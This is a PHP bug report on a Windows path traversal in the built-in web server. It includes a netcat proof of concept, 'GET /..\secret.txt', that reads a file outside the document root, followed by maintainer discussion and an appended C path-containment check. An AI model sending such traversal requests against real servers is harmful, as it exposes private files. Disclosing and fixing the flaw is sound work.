Bug #62883 PHP built-in web server - path traversal
Submitted: 2012-08-21 21:11 UTC Modified: 2018-05-14 00:20 UTC
From: krzotr at gmail dot com Assigned: mattficken (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.4.6 OS: Windows XP
Private report: No CVE-ID: None
 [2012-08-21 21:11 UTC] krzotr at gmail dot com
Description:
------------
The PHP built-in web server is able to read a file outside the web server root directory

Test script:
---------------
C:\>type secret.txt
My secret password: 0123456789
C:\php>php -S 127.0.0.1:8080
PHP 5.4.6 Development Server started at Tue Aug 21 22:55:38 2012
Listening on http://127.0.0.1:8080
Document root is C:\php
------------------------------------------------------------------------------
C:\Documents and Settings>nc 127.0.0.1 8080
GET /..\secret.txt

HTTP/0.9 200 OK
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 30

My secret password: 0123456789
------------------------------------------------------------------------------
Server log:
[Tue Aug 21 22:55:56 2012] 127.0.0.1:25202 [200]: /..\secret.txt

Expected result:
----------------
Invalid request

Actual result:
--------------
My secret password: 0123456789

 [2012-09-23 15:12 UTC] laruence@php.net
hmm, seems not reproducible on Linux, there may be something wrong in the httpd
parser while on Windows.

anyway, the built-in server is targeted at testing and development purposes. so, I think this
is not that harmful :)

thanks
 [2013-05-20 08:11 UTC] stas@php.net
-Assigned To: +Assigned To: moriyoshi
 [2017-10-24 06:33 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: moriyoshi +Assigned To:
 [2018-03-10 13:42 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2018-03-10 13:42 UTC] cmb@php.net
According to our security issue classification[1], this would not
be a security issue, since the built-in webserver is not meant to
be used on a public network.

[1] <https://wiki.php.net/security#not_a_security_issue>
 [2018-03-13 01:14 UTC] mattficken@php.net
An issue like this should probably be fixed regardless of policy.

But, I can NOT repro this issue on 7.2.2 on Windows.

I believe this issue was fixed a while ago.

-Thoughts?

Otherwise, I will close this bug.
 [2018-05-14 00:20 UTC] mattficken@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: mattficken
 [2018-05-14 00:20 UTC] mattficken@php.net
see previous comment
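
The request in the report uses a backslash, which is a path separator on Windows but an ordinary filename character on POSIX systems. The following is an added example (not PHP's own code and not part of the report) of a containment check a server could run on the already URL-decoded request path; `path_stays_in_root` and its `win_separators` flag are hypothetical names.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (assumption, not PHP's implementation): returns true
 * when the request path, walked segment by segment, never climbs above the
 * document root. win_separators=true also splits on '\', as Windows file
 * APIs do; false models POSIX, where '\' is part of the file name.
 * Assumes the path has already been URL-decoded. */
bool path_stays_in_root(const char *path, bool win_separators)
{
    const char *seps = win_separators ? "/\\" : "/";
    int depth = 0;                          /* levels below the root */

    while (*path != '\0') {
        size_t len = strcspn(path, seps);   /* length of next segment */

        if (len == 2 && path[0] == '.' && path[1] == '.') {
            if (--depth < 0)
                return false;               /* ".." escaped the root */
        } else if (len > 0 && !(len == 1 && path[0] == '.')) {
            depth++;                        /* ordinary name: one level down */
        }
        path += len;
        if (*path != '\0')
            path++;                         /* skip the separator */
    }
    return true;
}

int main(void)
{
    const char *req = "/..\\secret.txt";    /* request path from the report */

    printf("Windows separators: %s\n",
           path_stays_in_root(req, true) ? "allowed" : "rejected");
    printf("POSIX separators:   %s\n",
           path_stays_in_root(req, false) ? "allowed" : "rejected");
    return 0;
}
```

With POSIX separators the same string is a single file name inside the root, so a check that only splits on `/` lets it through to a Windows file API that then interprets the backslash.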
 
Last updated: Fri Apr 19 05:01:29 2024 UTC